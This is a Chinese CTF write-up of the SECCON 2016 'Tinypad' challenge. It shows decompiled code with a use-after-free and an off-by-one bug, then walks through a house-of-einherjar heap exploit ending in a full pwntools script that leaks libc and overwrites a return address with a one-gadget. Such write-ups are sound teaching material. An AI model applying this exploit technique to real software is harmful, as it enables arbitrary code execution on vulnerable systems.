SECCON-QUALS-2016-Tinypad

一道典型的house-of-einherjar题~

分析

检查发现只有PIE没开，还有个特别的FULL RELRO保护，这样就不能写GOT了：

经过分析发现如下结构体：

其第一个域为一个tmpBuf，用于临时存放输入/出的内容，大小为256Bytes，接着就是4个条目，存放最多四个的notes，包括长度与内容地址，接着查看程序主体，增删查改功能都有：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rax
  int CMD; // eax
  signed int reqSize; // eax
  __int64 v6; // rax
  unsigned __int64 v7; // rax
  int c; // [rsp+4h] [rbp-1Ch]
  int i; // [rsp+8h] [rbp-18h]
  int index; // [rsp+Ch] [rbp-14h]
  int CMDB; // [rsp+10h] [rbp-10h]
  int size; // [rsp+14h] [rbp-Ch]
  unsigned __int64 v14; // [rsp+18h] [rbp-8h]

  v14 = __readfsqword(0x28u);
  CMDB = 0;
  write_n("\n", 1LL);
  write_n(
    "  ============================================================================\n"
    "// _|_|_|_|_|  _|_|_|  _|      _|  _|      _|  _|_|_|      _|_|    _|_|_|     \\\\\n"
    "||     _|        _|    _|_|    _|    _|  _|    _|    _|  _|    _|  _|    _|   ||\n"
    "||     _|        _|    _|  _|  _|      _|      _|_|_|    _|_|_|_|  _|    _|   ||\n"
    "||     _|        _|    _|    _|_|      _|      _|        _|    _|  _|    _|   ||\n"
    "\\\\     _|      _|_|_|  _|      _|      _|      _|        _|    _|  _|_|_|     //\n"
    "  ============================================================================\n",
    563LL);
  write_n("\n", 1LL);
  do
  {
      
    for ( i = 0; i <= 3; ++i )
    {
      LOBYTE(c) = i + '1';
      writeln("+------------------------------------------------------------------------------+\n", 81LL);
      write_n(" #   INDEX: ", 12LL);
      writeln((char *)&c, 1LL);
      write_n(" # CONTENT: ", 12LL);
      if ( *(_QWORD *)&tinypad.field_0[16 * (i + 16LL) + 8] )           //当存储内容的指针不为0就输出内容
      {
        v3 = strlen(*(const char **)&tinypad.field_0[16 * (i + 16LL) + 8]);
        writeln(*(char **)&tinypad.field_0[16 * (i + 16LL) + 8], v3);
      }
      writeln("\n", 1LL);
    }
    index = 0;
    CMD = getcmd();
    CMDB = CMD;
    if ( CMD == 'D' )                             //删除
    {
      write_n("(INDEX)>>> ", 11LL);
      index = read_int();                       // 绝逼有用的
      if ( index > 0 && index <= 4 )
      {
        if ( *(_QWORD *)&tinypad.field_0[16 * (index - 1 + 16LL)] ) //当长度不为0即可释放
        {
          free(*(void **)&tinypad.field_0[16 * (index - 1 + 16LL) + 8]);
          *(_QWORD *)&tinypad.field_0[16 * (index - 1 + 16LL)] = 0LL;
          writeln("\nDeleted.", 9LL);                           //整个释放过程并没有将指向内容的指针清零，可能存在uaf
        }
        else
        {
          writeln("Not used", 8LL);
        }
      }
      else
      {
        writeln("Invalid index", 13LL);
      }
    }
    else if ( CMD > 'D' )
    {
      if ( CMD != 'E' )
      {
        if ( CMD == 'Q' )
          continue;
LABEL_43:
        writeln("No such a command", 17LL);
        continue;
      }
      write_n("(INDEX)>>> ", 11LL);
      index = read_int();
      if ( index > 0 && index <= 4 )
      {
        if ( *(_QWORD *)&tinypad.field_0[16 * (index - 1 + 16LL)] )
        {
          c = '0';
          strcpy(tinypad.field_0, *(const char **)&tinypad.field_0[16 * (index - 1 + 16LL) + 8]);
          while ( toupper((char *)(unsigned int)c) != 'Y' )
          {
            write_n("CONTENT: ", 9LL);
            v6 = strlen(tinypad.field_0);
            writeln(tinypad.field_0, v6);
            write_n("(CONTENT)>>> ", 13LL);
            v7 = strlen(*(const char **)&tinypad.field_0[16 * (index - 1 + 16LL) + 8]);
            read_until(tinypad.field_0, v7, 0xAu);
            writeln("Is it OK?", 9LL);
            write_n("(Y/n)>>> ", 9LL);
            read_until((char *)&c, 1uLL, 0xAu);
          }
          strcpy(*(char **)&tinypad.field_0[16 * (index - 1 + 16LL) + 8], tinypad.field_0);
          writeln("\nEdited.", 8LL);
        }
        else
        {
          writeln("Not used", 8LL);
        }
      }
      else
      {
        writeln("Invalid index", 13LL);
      }
    }
    else
    {
      if ( CMD != 'A' )
        goto LABEL_43;
      while ( index <= 3 && *(_QWORD *)&tinypad.field_0[16 * (index + 16LL)] )
        ++index;
      if ( index == 4 )
      {
        writeln("No space is left.", 17LL);
      }
      else
      {
        size = -1;
        write_n("(SIZE)>>> ", 10LL);
        size = read_int();
        if ( size <= 0 )            //添加笔记会malloc，输入笔记长度，最大256Bytes
        {
          reqSize = 1;
        }
        else
        {
          reqSize = size;
          if ( (unsigned __int64)size > 0x100 )
            reqSize = 256;
        }
        size = reqSize;
        *(_QWORD *)&tinypad.field_0[16 * (index + 16LL)] = reqSize;
        *(_QWORD *)&tinypad.field_0[16 * (index + 16LL) + 8] = malloc(size);
        if ( !*(_QWORD *)&tinypad.field_0[16 * (index + 16LL) + 8] )
        {
          writerrln("[!] No memory is available.", 27LL);
          exit(-1);
        }
        write_n("(CONTENT)>>> ", 13LL);
        read_until(*(char **)&tinypad.field_0[16 * (index + 16LL) + 8], size, '\n');
        writeln("\nAdded.", 7LL);
      }
    }
  }
  while ( CMDB != 'Q' );
  return 0;
}

从上面可以看出最大分配256字节，存在uaf可以用于泄露堆与libc。另外在输入的地方存在off by one漏洞：

unsigned __int64 __fastcall read_until(char *buf, unsigned __int64 len, unsigned int endC)
{
  int endCB; // [rsp+Ch] [rbp-34h]
  unsigned __int64 i; // [rsp+28h] [rbp-18h]
  __int64 v6; // [rsp+30h] [rbp-10h]

  endCB = endC;
  for ( i = 0LL; i < len; ++i )
  {
    v6 = read_n(0LL, &buf[i], 1LL);
    if ( v6 < 0 )
      return -1LL;
    if ( !v6 || buf[i] == endCB )
      break;
  }
  buf[i] = 0;                                   // off by one
  if ( i == len && buf[len - 1] != '\n' )       // 必须以endC结束
    dummyinput(endCB);
  return i;
}

利用

通过上面分析发现两个明显的漏洞，一个uaf只能用于泄露信息，因为不能编辑所以也不能拿做他用，那个off by one可能就是主要利用点了，覆盖pre_use位释放前面，这里的套路一般都是先控制tinypad域，因为它很多指针而且能对指针任意读写，一个简单的方法就是house of einherjar利用思路如下：

先分配4个大小为0x100的chunk(此处及以下指的请求大小，简单点。它的大小大于fastbin的maxfast即可)
释放chunk0,chunk2，此时内存如图：
现在得到了libc和heap的地址啦，使用edit在tinypad里面伪造一个chunk，伪造的chunksize要为tinypad到chunk1的距离。
释放chunk3,会进行合并,此时堆为：chunk0 chunk1(used) topchunk
再次分配一个0x100大小的chunk，会malloc chunk0到第一个位置，此时对其写入256字节数据，就会覆盖到chunk1的pre_use位，并且写的数据中pre_size要改为到tinypad的距离。
释放chunk1，会前向与后向合并，此时topchunk就指向tinypad了
再次分配就可获得tinypad区域，对其进行操作覆盖关键位置(指针处)，即可任意位置读写
先读取__environ获得栈地址
再写入rop或者先尝试onegadget。

利用代码如下：

#!/usr/bin/env python
# coding=utf-8
from pwn import *

binary = './tinypad'
libr = '/root/Desktop/glibc-2.24/build/'
ld = libr + 'elf/ld.so'
libc = libr + 'libc.so'
tinypadAddr = 0x602040
sReqSize = 0x90-8
lReqSize = 0x100-8
onegadget = 0x3f53e # 0xd6601
context.log_level = 'info'
def sla(a,b):
    p.sendlineafter(b,a)

def r(size=0x1000):
    return p.recv(size)
def ru(s):
    return p.recvuntil(s)
def cp():
    return process([ld,'--library-path',libr,binary])
#    return remote('127.0.0.1',4000)
def add(size,s):
    sla('A','(CMD)>>>')
    assert(size<=0x100)
    sla(str(size),'(SIZE)>>>')
    sla(s,'(CONTENT)>>>')
    assert('Added' in ru('+----'))

def delete(i):
    sla('D','(CMD)>>>')
    sla(str(i),'(INDEX)>>>')
    assert('Invalid' not in ru('+----'))

def edit(i,s,y='Y'):
#    sla('E','(CMD)>>>')
    print 1
    p.sendline('E')
    print 2
    sla(str(i),'(INDEX)>>>')
    sla(s,'(CONTENT)>>>')
    sla(y,'(Y/n)>>>')
    aaa = ru('+---')
    print aaa 
    assert('Edited' in aaa)

def getInfo():
    add(sReqSize,'')
    add(lReqSize,'a'*100)
    add(lReqSize,'')
    add(lReqSize,'')
    delete(3)
    delete(1)
    st = ru('+- MENU')
    st1 = st.split('# CONTENT: ')
    heapAddr = u64(st1[1].split('\n\n+---')[0][:-1].ljust(8,'\x00'))
    libcAddr = u64(st1[3].split('\n\n+---')[0][:-1].ljust(8,'\x00'))
    log.info('heap3Addr:0x{:x}'.format(heapAddr))
    log.info('libcAddr:0x{:x}'.format(libcAddr))
    env = libcAddr + 0x23e0
    log.info('env:0x{:x}'.format(env))
    return heapAddr,libcAddr,env 
def exp():
    fakechunkSize = heapAddr-(lReqSize+0x8)-tinypadAddr
    fakechunk = p64(0)+p64(fakechunkSize+1)+p64(tinypadAddr)*4
    delete(4)
    add(sReqSize,fakechunk.ljust(sReqSize-8)+p64(fakechunkSize))
    edit(2,fakechunk)
    delete(2)

p = cp()
heapAddr,libcAddr,env = getInfo()
exp()
mReqSize = 0xf0-8
add(mReqSize,'a'*(mReqSize-1))
add(mReqSize,'a'*8+p64(env))
st = ru('+- MENU')
st1 = st.split('# CONTENT: ')
stackAddr = u64(st1[1].split('\n\n+---')[0][:-1].ljust(8,'\x00'))
log.info('stackAddr:0x{:x}'.format(stackAddr))
mainRetAddr = stackAddr-0xf0+0x08
onegadget = libcAddr - 0x396b58 + onegadget
edit(3,'a'*8+p64(mainRetAddr))
log.info('mainRetAddr:0x{:x}'.format(mainRetAddr))
log.info('onegadgetAddr:0x{:x}'.format(onegadget))
edit(1,p64(onegadget))
p.sendline('Q')
p.interactive()
#gdb.attach(p)
#delete(2)
#add(0x80-8),'a'*(0x20-8)+p64(0x80-8)+p64(env))
pause()

结果

参考

[0] 题目地址
[1] https://0x48.pw/2018/01/16/0x41/